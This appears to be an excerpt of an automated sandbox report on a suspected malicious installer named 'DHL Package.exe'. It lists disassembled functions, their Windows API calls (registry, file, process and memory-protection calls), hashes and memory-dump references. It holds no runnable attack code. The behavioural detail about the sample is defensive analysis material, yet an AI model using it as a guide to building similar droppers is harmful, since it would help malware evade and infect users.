Instruction Fuzzy Hash: 30E086319001246ADB303AF15E8DEBF21586F44345B14093FFA12B62C2DAFC0C42467D

Function 00406276 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 0040629F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction ID: 5e8c37c3a871b4686c003d5622fbd1f004467430ef2d1147db4d8909a4c30713
Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction Fuzzy Hash: 6EE0E67201010DBFEF095F50EC0AE7B371DEB04310F01452EF916E4051E6B5A9309634

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 1b0d49dd72dabc9e76704ceb669f754e98eb55e79acd6c4ba17716b2a4a9ff70
Instruction ID: 92f478ab202d62e1837fe9de49df27786daa87776153eb38916ae48360e4a3b1
Opcode Fuzzy Hash: 1b0d49dd72dabc9e76704ceb669f754e98eb55e79acd6c4ba17716b2a4a9ff70
Instruction Fuzzy Hash: A9E0D872300100EBD700DFA4DD48EAB3368EF50318B304136E611A50C0D2B459019329

Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403444,00000000,00000000,0040329B,?,00000004,00000000,00000000,00000000), ref: 00405F68

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 9c26e1e14bdaa641b2cd1607f69676223ac96f38baf9ffa7ddee8aaf7cdc77b6
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 0DE0EC3221025EABDF10AEA59C04EEB7B6CEB053A0F004877FD25E7150D735E9219BA8

Function 00405F83 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,00403412,000000FF,00414EC0,00000000,00414EC0,00000000,?,00000004,00000000), ref: 00405F97

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: e9dec13cd64576ed05e9c77268ddc280887ed2a39adbcd5729fa6c11973cde1c
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: B8E0EC7221065AABDF109E659C00BEB7B6CEB05360F004476FE65E3150E639E9219BA5

Function 6CA729DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6CA7505C,00000004,00000040,6CA7504C), ref: 6CA729FD

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f18df181dc71c0ab842e7a29f1553a0adcf7e22881be5d668305402f08729b6e
Instruction ID: a3c0dd1bfb31e55bb339085626a94d26549c2173d14e027afc5f8fe5051d5af1
Opcode Fuzzy Hash: f18df181dc71c0ab842e7a29f1553a0adcf7e22881be5d668305402f08729b6e
Instruction Fuzzy Hash: 2BF0ACB87043A2DEDB6ACF28844CB053BF0B70B304B15C53AE14AD6640E3344047CBB1

Function 00406248 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062D6,?,00000000,?,?,Call,?), ref: 0040626C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: bea724714cad9c1dc166f779914bff17c7130a41f5efdae6cf1778ebc3f0871c
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: AFD0123210020DFBDF116FA0ED01FAB772DAB08350F014426FE06A40A1D775D530A768

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b94bd691ebf15dc608dfd6f8c15b532d0673ac7a6ed34f3d4a9c9e7cf74e8c06
Instruction ID: d0c8bdfabdae3c8c8ee7f1a942bb5adfb9f4894ad1ff7db24bb333cf26e5fd72
Opcode Fuzzy Hash: b94bd691ebf15dc608dfd6f8c15b532d0673ac7a6ed34f3d4a9c9e7cf74e8c06
Instruction Fuzzy Hash: D2D01772B04104DBCB00DFA9AA48A9E73B1EF24328B308537D521F21D0D6B989519A2A

Function 0040437D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 6a5b654620e47c205ef353ff56fd69433b0ebd381e98485a923522fb35466dbd
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: A8C09BB1740705BBEE218F519D4DF1777586750700F294479B755F60D0D674D850D61C

Function 00403447 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403455

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Function 00404353 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040412A), ref: 0040435D

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

Part of subcall function 004059C4: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
Part of subcall function 004059C4: CloseHandle.KERNEL32(?), ref: 004059FA

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
Part of subcall function 0040687B: GetExitCodeProcess.KERNEL32(?,?), ref: 004068AE

Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: f906b7c78a5edeb734fbc228ec77ee2ff4005b91535a7ec60c46a56965a0dc9a
Instruction ID: 4d96ac15eb21dec6eadeffd875f927664214cc5c784fe1dba304e89e249c00b1
Opcode Fuzzy Hash: f906b7c78a5edeb734fbc228ec77ee2ff4005b91535a7ec60c46a56965a0dc9a
Instruction Fuzzy Hash: 2CF09072A05112DBCB20EFA699849EE76F4EF00319B21453BE512B21D0C3BC4E428A6E

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 017bebf2ae80f01aa6e0fc81b167a013b35d274b07bfaa4a9130182a9ccc4be7
Instruction ID: 4b0e07c71dfd6a470dbcaf672fe51c7697a76a8b28de1eb21f3750cf6b8f93dc
Opcode Fuzzy Hash: 017bebf2ae80f01aa6e0fc81b167a013b35d274b07bfaa4a9130182a9ccc4be7
Instruction Fuzzy Hash: 72D05E73B201008BC710DFB8BE8545E73B8FB503193308837D842E2191E6B888528629

Function 6CA7121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 64394c0035b8d9659b9e5339aafcafb966a4f9934eb2edb2f98ac217bd038597
Instruction ID: d212a1556a3e2ce48b60ea53ab420c3136bf6134ba18ad489c81c797a9446d8c
Opcode Fuzzy Hash: 64394c0035b8d9659b9e5339aafcafb966a4f9934eb2edb2f98ac217bd038597
Instruction Fuzzy Hash: B6B01274B00211DFEE058B64CC0EF343274FB01301F04C010F601C0180C22448038938

Non-executed Functions

Function 00404822 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404871
SetWindowTextW.USER32(00000000,?), ref: 0040489B
SHBrowseForFolderW.SHELL32(?), ref: 0040494C
CoTaskMemFree.OLE32(00000000), ref: 00404957
lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404989
lstrcatW.KERNEL32(?,Call), ref: 00404995
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7

Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38

Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
Part of subcall function 0040668A: CharNextW.USER32(?,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
Part of subcall function 0040668A: CharPrevW.USER32(?,?,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404A6A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A85

Part of subcall function 00404BDE: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
Part of subcall function 00404BDE: wsprintfW.USER32 ref: 00404C88
Part of subcall function 00404BDE: SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B

Strings

C:\Users\user\AppData\Local\peggle, xrefs: 00404972
Call, xrefs: 00404983, 00404988, 00404993
A, xrefs: 00404945

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
